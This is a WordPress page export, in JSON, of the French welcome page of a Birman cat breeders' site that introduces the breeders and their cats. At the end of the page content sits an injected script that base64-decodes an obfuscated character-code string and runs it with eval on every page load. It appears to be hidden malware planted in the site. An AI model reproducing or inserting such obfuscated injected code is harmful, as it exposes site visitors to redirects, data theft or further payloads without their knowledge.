{"id":4,"date":"2014-01-30T19:44:04","date_gmt":"2014-01-30T18:44:04","guid":{"rendered":"http:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/?page_id=4"},"modified":"2017-11-21T20:23:58","modified_gmt":"2017-11-21T19:23:58","slug":"accueil","status":"publish","type":"page","link":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/","title":{"rendered":"Accueil"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-66\" src=\"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-content\/uploads\/2014\/01\/bg_bienvenue.gif\" alt=\"bg_bienvenue\" width=\"238\" height=\"110\" \/><\/p>\n<p style=\"text-align: center;\">Bienvenue dans l&rsquo;univers de <span style=\"color: #765339;\"><strong>Swahili&rsquo;s et Massa\u00ef Mara<\/strong><strong>,<\/strong><\/span> deux passionn\u00e9es de Sacr\u00e9 de Birmanie.<br \/>\nC&rsquo;est tout naturellement que cette race s&rsquo;est impos\u00e9e \u00e0 nous comme la plus merveilleuse de toutes.<br \/>\nC&rsquo;est donc pour notre plus grand plaisir que nous partageons notre vie et notre quotidien avec nos amours \u00e0 quatre pattes.<br \/>\nNos chats sont membres de notre famille \u00e0 part enti\u00e8re et vivent chez nous avec tout notre amour, en totale libert\u00e9.<br \/>\n\u00c9tant auxiliaires v\u00e9t\u00e9rinaires, nous veillons tout particuli\u00e8rement \u00e0 leur sant\u00e9 et leur bien \u00eatre.<\/p>\n<p style=\"text-align: center;\">Nos familles se composent de : notre femelle <span style=\"color: #99cc00;\"><em><strong> Lindalyan<\/strong><\/em><\/span>, et nos 7 neutr\u00e9s <span style=\"color: #99cc00;\"><em><strong>Cyr\u00e8ne, <em><strong>Esm\u00e9e, <\/strong><\/em><em><strong>Farewell, P\u00eache, Gayan,<\/strong><\/em><\/strong><\/em><\/span> <span style=\"color: #99cc00;\"><em><strong>Delphy<\/strong><\/em><\/span>, <span style=\"color: #99cc00;\"><em><strong>En\u00e9a <\/strong><\/em><\/span><span style=\"color: #99cc00;\"><em><strong><span style=\"color: #ffffff;\">et<\/span><\/strong><\/em><em><strong> Ginko<\/strong><\/em><\/span>.<strong><em><br \/>\n<\/em><\/strong><\/p>\n<p style=\"text-align: center;\">Un grand merci aux personnes qui nous ont aid\u00e9es \u00e0 r\u00e9aliser notre r\u00eave et qui sont toujours \u00e0 nos c\u00f4t\u00e9s aujourd&rsquo;hui.<br \/>\nEt merci C\u00e9line pour ce merveilleux site, nous ne pouvions esp\u00e9rer mieux.<\/p>\n<p style=\"text-align: center;\">Pour plus de renseignements, n&rsquo;h\u00e9sitez pas \u00e0 prendre contact avec nous.<br \/>\nNous vous souhaitons une agr\u00e9able visite \u00e0 travers notre site.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-67\" src=\"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-content\/uploads\/2014\/01\/bonne_visite.png\" alt=\"bonne_visite\" width=\"340\" height=\"191\" srcset=\"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-content\/uploads\/2014\/01\/bonne_visite.png 340w, https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-content\/uploads\/2014\/01\/bonne_visite-300x168.png 300w\" sizes=\"(max-width: 340px) 100vw, 340px\" \/><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><br \/>\n<script type=\"text\/javascript\">\nvar FQUICPXBJZ = atob('dmFyIExSV05OWE1VUlcgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE1IC0gNSwgMTIzIC0gNSwgMTAxIC0gNCwgMTIyIC0gOCwgMzYgLSA0LCAxMTAgLSAzLCAxMDMgLSAyLCAxMjcgLSA2LCAzNyAtIDUsIDY3IC0gNiwgMzYgLSA0LCA0OCAtIDksIDc3IC0gOCwgMTA2IC0gNSwgODkgLSA1LCA4NSAtIDUsIDExMyAtIDQsIDExOSAtIDcsIDEyNyAtIDgsIDkyIC0gMiwgMTEyIC0gMSwgODkgLSAyLCA0MyAtIDQsIDY2IC0gNywgMTIgLSAyLCAxMjEgLSAzLCAxMDAgLSAzLCAxMjAgLSA2LCA0MCAtIDgsIDEwOSAtIDgsIDExNSAtIDUsIDEwMCAtIDEsIDEwOCAtIDcsIDEwNiAtIDYsIDMzIC0gMSwgNjYgLSA1LCAzMyAtIDEsIDQwIC0gMSwgODIgLSA1LCAxMjUgLSA2LCA4NiAtIDUsIDExMyAtIDQsIDEwNiAtIDcsIDczIC0gNywgNTcgLSA5LCA2OSAtIDIsIDc3IC0gOCwgOTAgLSA2LCA5MSAtIDEsIDg3IC0gNywgMTA1IC0gOCwgMTE1IC0gNiwgODYgLSAxLCA2OSAtIDMsIDgzIC0gNCwgMTI4IC0gNiwgODEgLSA0LCA5MSAtIDIsIDgxIC0gOSwgODYgLSA0LCA3OSAtIDYsIDUzIC0gNSwgNzcgLSA2LCA1NSAtIDQsIDEwOCAtIDEsIDExMiAtIDMsIDcxIC0gMSwgMTI0IC0gMiwgNzQgLSA1LCAxMjEgLSAxLCA3OCAtIDcsIDkwIC0gOCwgOTIgLSA3LCAxMjQgLSAzLCA3OSAtIDEsIDExMiAtIDksIDExNSAtIDQsIDYzIC0gOSwgNzkgLSA2LCA3MyAtIDgsIDExNiAtIDEsIDEwNSAtIDIsIDEwOCAtIDcsIDc1IC0gNiwgMTE5IC0gOCwgNzEgLSAzLCA3MSAtIDEsIDY4IC0gMSwgMTA5IC0gNiwgODAgLSA5LCA3OSAtIDUsIDEzMSAtIDksIDc2IC0gNiwgNjkgLSAyLCAxMDggLSA2LCA5MiAtIDUsIDEyNCAtIDgsIDExMiAtIDIsIDcwIC0gNSwgNzIgLSA3LCA5NCAtIDksIDYxIC0gNSwgNjcgLSAyLCA1NCAtIDMsIDExMiAtIDUsIDU0IC0gNCwgNzQgLSA5LCA3NiAtIDksIDcyIC0gNywgODMgLSAxLCA3NCAtIDMsIDg3IC0gNiwgODYgLSA1LCA3OSAtIDksIDgzIC0gNiwgMTI4IC0gOSwgNTQgLSA2LCAxMDYgLSAxLCA3OCAtIDEsIDg5IC0gOCwgNzQgLSA4LCA2MyAtIDcsIDEwMiAtIDIsIDEyNiAtIDYsIDU3IC0gNSwgNzAgLSAzLCA3MSAtIDEsIDgwIC0gOCwgNTMgLSA0LCA3MyAtIDUsIDEwNyAtIDgsIDcyIC0gNSwgNTQgLSA2LCA4NiAtIDQsIDgyIC0gOSwgNzMgLSA2LCA2NyAtIDEsIDkyIC0gNCwgOTIgLSA0LCA1OCAtIDksIDExMiAtIDksIDExOSAtIDIsIDc4IC0gNiwgOTIgLSA4LCA5OCAtIDksIDExMiAtIDYsIDcyIC0gNywgMTI2IC0gNCwgNTIgLSA0LCAxMjggLSA2LCA3MCAtIDIsIDY4IC0gMywgNjcgLSAyLCAxMDYgLSA1LCAxMDYgLSA2LCA3MiAtIDcsIDcwIC0gMSwgNTcgLSAyLCAxMDYgLSA5LCAxMTMgLSA5LCA5MiAtIDMsIDExMSAtIDgsIDgwIC0gMywgODggLSA2LCAxMTQgLSA3LCA5MiAtIDIsIDc3IC0gNywgNzggLSA2LCA5MyAtIDgsIDcwIC0gMywgODMgLSA1LCAxMTIgLSA3LCAxMjIgLSAzLCA3NyAtIDEsIDEwMyAtIDIsIDExMCAtIDQsIDExNyAtIDYsIDEwOSAtIDgsIDkyIC0gNiwgNTMgLSA0LCA2MSAtIDgsIDExMyAtIDksIDk0IC0gNCwgODYgLSAyLCA4NCAtIDcsIDExNCAtIDEsIDcwIC0gNCwgMTA5IC0gNCwgNzUgLSA2LCA1OCAtIDEsIDc2IC0gOSwgNjkgLSAzLCA1OSAtIDcsIDc3IC0gOSwgMTA1IC0gNSwgNjkgLSA0LCAxMDYgLSA3LCAxMjQgLSAzLCA4MCAtIDYsIDY5IC0gNCwgNzYgLSA2LCA1OSAtIDUsIDc5IC0gMiwgOTEgLSA5LCA1MyAtIDUsIDY5IC0gNCwgNzggLSA5LCAxMTUgLSA5LCA4NCAtIDMsIDc4IC0gMiwgNzcgLSA3LCA2OSAtIDIsIDUyIC0gNCwgODEgLSA0LCA4NCAtIDUsIDY5IC0gMSwgODcgLSA1LCA3NSAtIDUsIDY2IC0gMSwgNjggLSAzLCA5NCAtIDksIDYyIC0gNiwgNjggLSAzLCA2MCAtIDksIDU4IC0gNSwgNTAgLSA3LCAxMDUgLSA3LCAxMjMgLSA0LCA2NCAtIDMsIDY0IC0gMywgNDQgLSA1LCA2NyAtIDgsIDEzIC0gMywgMTA3IC0gNSwgMTIwIC0gMywgMTE1IC0gNSwgMTAyIC0gMywgMTI1IC0gOSwgMTA5IC0gNCwgMTE2IC0gNSwgMTE4IC0gOCwgMzcgLSA1LCAxMjEgLSAxLCAxMTcgLSA2LCAxMjAgLSA2LCAxMDIgLSA3LCAxMDggLSA3LCAxMTQgLSA0LCAxMDYgLSA3LCA0MyAtIDMsIDExOSAtIDQsIDEyMCAtIDQsIDEyMiAtIDgsIDEwNyAtIDIsIDExMyAtIDMsIDEwOCAtIDUsIDUwIC0gNiwgNDEgLSA5LCAxMTUgLSA4LCAxMDUgLSA0LCAxMjUgLSA0LCA0NyAtIDYsIDM0IC0gMiwgMTMwIC0gNywgMTQgLSA0LCAzNSAtIDMsIDM4IC0gNiwgMTIzIC0gNSwgMTA1IC0gOCwgMTIxIC0gNywgMzcgLSA1LCAxMTggLSA0LCAxMDggLSA3LCAxMTcgLSAyLCAzNyAtIDUsIDY3IC0gNiwgMzQgLSAyLCA0MyAtIDQsIDQxIC0gMiwgNjQgLSA1LCAxNiAtIDYsIDM0IC0gMiwgNDAgLSA4LCAxMTEgLSA5LCAxMjAgLSA5LCAxMTkgLSA1LCAzMyAtIDEsIDQ2IC0gNiwgMTI0IC0gNiwgMTA2IC0gOSwgMTIyIC0gOCwgMzkgLSA3LCAxMTIgLSA3LCAzOSAtIDcsIDY0IC0gMywgMzggLSA2LCA1MSAtIDMsIDY1IC0gNiwgMzUgLSAzLCAxMDkgLSA0LCAzNCAtIDIsIDY4IC0gOCwgMzMgLSAxLCAxMTkgLSA0LCAxMjIgLSA2LCAxMTYgLSAyLCAxMDkgLSA0LCAxMTMgLSAzLCAxMDYgLSAzLCA1MCAtIDQsIDEwOSAtIDEsIDExMCAtIDksIDExNSAtIDUsIDEwNiAtIDMsIDEyMiAtIDYsIDExMSAtIDcsIDY2IC0gNywgMzYgLSA0LCAxMDggLSAzLCA1MCAtIDcsIDQ4IC0gNSwgNTAgLSA5LCAzNSAtIDMsIDEyNiAtIDMsIDExIC0gMSwgMzQgLSAyLCA0MCAtIDgsIDM0IC0gMiwgNDEgLSA5LCAxMTYgLSAyLCAxMDQgLSAzLCAxMjEgLSA2LCA0MCAtIDgsIDUyIC0gOSwgNjQgLSAzLCA0MSAtIDksIDg0IC0gMSwgMTIxIC0gNSwgMTIxIC0gNywgMTA5IC0gNCwgMTEzIC0gMywgMTExIC0gOCwgNTMgLSA3LCAxMTAgLSA4LCAxMjEgLSA3LCAxMTYgLSA1LCAxMTIgLSAzLCA3NCAtIDcsIDExMSAtIDcsIDEwMyAtIDYsIDEyMCAtIDYsIDY5IC0gMiwgMTE3IC0gNiwgMTA2IC0gNiwgMTA4IC0gNywgNDUgLSA1LCAxMjAgLSA1LCAxMTkgLSAzLCAxMjIgLSA4LCAxMDggLSAzLCAxMTIgLSAyLCAxMDUgLSAyLCA1MSAtIDUsIDEwMSAtIDIsIDExMSAtIDcsIDEwMSAtIDQsIDEyMSAtIDcsIDcwIC0gMywgMTE2IC0gNSwgMTAzIC0gMywgMTA0IC0gMywgNjcgLSAyLCAxMjUgLSA5LCA0NiAtIDYsIDExMCAtIDUsIDQ5IC0gOCwgMzUgLSAzLCA5NSAtIDEsIDE2IC0gNiwgMTYgLSA3LCAxMSAtIDIsIDEzIC0gNCwgMTMgLSA0LCAxMTYgLSA5LCAxMDggLSA3LCAxMjkgLSA4LCA0NyAtIDEsIDEwMyAtIDQsIDExMiAtIDgsIDEwNiAtIDksIDExOCAtIDQsIDc2IC0gOSwgMTE5IC0gOCwgMTA0IC0gNCwgMTA4IC0gNywgNzQgLSA5LCAxMjQgLSA4LCA0OSAtIDksIDExMCAtIDUsIDM2IC0gNCwgNDAgLSAzLCAzOCAtIDYsIDExNCAtIDcsIDEwMiAtIDEsIDEyOSAtIDgsIDU0IC0gOCwgMTEyIC0gNCwgMTA4IC0gNywgMTE1IC0gNSwgMTA2IC0gMywgMTE5IC0gMywgMTEyIC0gOCwgNDIgLSAxLCA0OCAtIDcsIDYxIC0gMiwgMTEgLSAxLCAzNyAtIDUsIDQwIC0gOCwgMTI4IC0gMywgMTUgLSA1LCAzNCAtIDIsIDM4IC0gNiwgMTIwIC0gNiwgMTA5IC0gOCwgMTI1IC0gOSwgMTE4IC0gMSwgMTE1IC0gMSwgMTE1IC0gNSwgNDAgLSA4LCAxMTUgLSAxLCAxMDIgLSAxLCAxMjMgLSA4LCA2MiAtIDMsIDExIC0gMSwgMTMwIC0gNSwgMTcgLSA3LCAxNiAtIDYsIDEyNSAtIDcsIDEwMiAtIDUsIDExNiAtIDIsIDM2IC0gNCwgMTA3IC0gNywgMTAzIC0gMiwgMTA1IC0gNiwgMzYgLSA0LCA2NyAtIDYsIDM4IC0gNiwgMTI4IC0gOCwgMTE3IC0gNiwgMTIwIC0gNiwgMTAyIC0gNywgMTA1IC0gNCwgMTE4IC0gOCwgMTA1IC0gNiwgNDQgLSA0LCAxMDMgLSA2LCAxMjUgLSA5LCAxMTMgLSAyLCAxMDQgLSA2LCA0OCAtIDgsIDEwOCAtIDcsIDExNiAtIDYsIDEwMCAtIDEsIDExMCAtIDksIDEwOSAtIDksIDQ1IC0gNCwgNTIgLSA4LCAzOCAtIDYsIDExNiAtIDksIDEwMyAtIDIsIDEyNSAtIDQsIDQ4IC0gNywgNjcgLSA4LCAxOSAtIDksIDQzIC0gMywgMTE1IC0gNSwgMTA0IC0gMywgMTIyIC0gMywgMzYgLSA0LCA3MiAtIDIsIDEyMSAtIDQsIDExMiAtIDIsIDEwMSAtIDIsIDEyMSAtIDUsIDEwOSAtIDQsIDExNyAtIDYsIDExMyAtIDMsIDQ1IC0gNSwgMTAyIC0gMiwgMTA4IC0gNywgMTAxIC0gMiwgNDIgLSAxLCA0OCAtIDcsIDQ5IC0gOSwgNDcgLSA2LCA2MiAtIDMsIDE3IC0gNywgMTcgLSA3KTtldmFsKExSV05OWE1VUlcpOw=='); \neval(FQUICPXBJZ);\n<\/script><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Bienvenue dans l&rsquo;univers de Swahili&rsquo;s et Massa\u00ef Mara, deux passionn\u00e9es de Sacr\u00e9 de Birmanie. C&rsquo;est tout naturellement que cette race s&rsquo;est impos\u00e9e \u00e0 nous comme la plus merveilleuse de toutes. C&rsquo;est donc pour notre plus grand plaisir que nous partageons notre vie et notre quotidien avec nos amours \u00e0 quatre pattes. Nos chats sont membres [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-json\/wp\/v2\/pages\/4"}],"collection":[{"href":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-json\/wp\/v2\/comments?post=4"}],"version-history":[{"count":5,"href":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-json\/wp\/v2\/pages\/4\/revisions"}],"predecessor-version":[{"id":13991,"href":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-json\/wp\/v2\/pages\/4\/revisions\/13991"}],"wp:attachment":[{"href":"https:\/\/www.pixanimal-studio.com\/websites\/swahilismassaimara\/wp-json\/wp\/v2\/media?parent=4"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}